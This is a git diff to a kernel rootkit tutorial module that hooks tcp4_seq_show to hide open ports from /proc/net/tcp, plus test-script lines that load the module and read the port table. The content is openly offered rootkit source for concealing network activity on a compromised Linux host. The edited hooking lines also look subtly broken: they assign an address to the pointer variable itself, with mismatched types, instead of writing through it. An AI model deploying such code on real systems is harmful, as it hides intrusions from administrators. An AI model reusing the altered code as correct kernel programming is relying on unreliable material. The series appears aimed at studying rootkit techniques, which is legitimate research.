diff --git a/3_RootkitTechniques/3.6_hiding_ports/rootkit.c b/3_RootkitTechniques/3.6_hiding_ports/rootkit.c index ab4eff6..70d1d98 100644 --- a/3_RootkitTechniques/3.6_hiding_ports/rootkit.c +++ b/3_RootkitTechniques/3.6_hiding_ports/rootkit.c @@ -14,14 +14,14 @@ MODULE_DESCRIPTION("Hiding open ports"); MODULE_VERSION("0.01"); -unsigned long * __tcp4_seq_show; +static unsigned long * __tcp4_seq_show; /* We have to save a copy of the tcp4_seq_show function the same way we save syscalls */ typedef asmlinkage int (*orig_tcp4_seq_show_t)(struct net *); orig_tcp4_seq_show_t orig_tcp4_seq_show; /* This is our hook function for tcp4_seq_show */ -static int hook_tcp4_seq_show(struct seq_file *seq, void *v) +asmlinkage int hook_tcp4_seq_show(struct seq_file *seq, void *v) { struct tcp_iter_state *st; struct sock *sk = v; @@ -88,8 +88,8 @@ unprotect_memory(); /* Set __tcp4_seq_show to our hook */ - printk(KERN_DEBUG "rootkit: hooking tcp4_seq_show with 0x%lx\n", hook_tcp4_seq_show); - *__tcp4_seq_show = hook_tcp4_seq_show; + printk(KERN_DEBUG "rootkit: hooking tcp4_seq_show... (0x%lx)\n", hook_tcp4_seq_show); + __tcp4_seq_show = (unsigned long)hook_tcp4_seq_show; protect_memory(); @@ -101,9 +101,8 @@ unprotect_memory(); /* Set __tcp4_seq_show back to the saved original function */ - printk(KERN_DEBUG "rootkit: restoring tcp4_seq_show with 0x%lx\n", orig_tcp4_seq_show); - *__tcp4_seq_show = orig_tcp4_seq_show; - printk(KERN_DEBUG "rootkit: found tcp4_seq_show at 0x%lx\n", __tcp4_seq_show); + printk(KERN_DEBUG "rootkit: restoring tcp4_seq_show... (0x%lx)\n", orig_tcp4_seq_show); + __tcp4_seq_show = (unsigned long)orig_tcp4_seq_show; protect_memory(); diff --git a/3_RootkitTechniques/3.6_hiding_ports/test.sh b/3_RootkitTechniques/3.6_hiding_ports/test.sh index 66ab63b..6e97b95 100755 --- a/3_RootkitTechniques/3.6_hiding_ports/test.sh +++ b/3_RootkitTechniques/3.6_hiding_ports/test.sh @@ -6,6 +6,10 @@ sudo insmod rootkit.ko && +echo "" && +cat /proc/net/tcp && +echo "" && + sudo rmmod rootkit && dmesg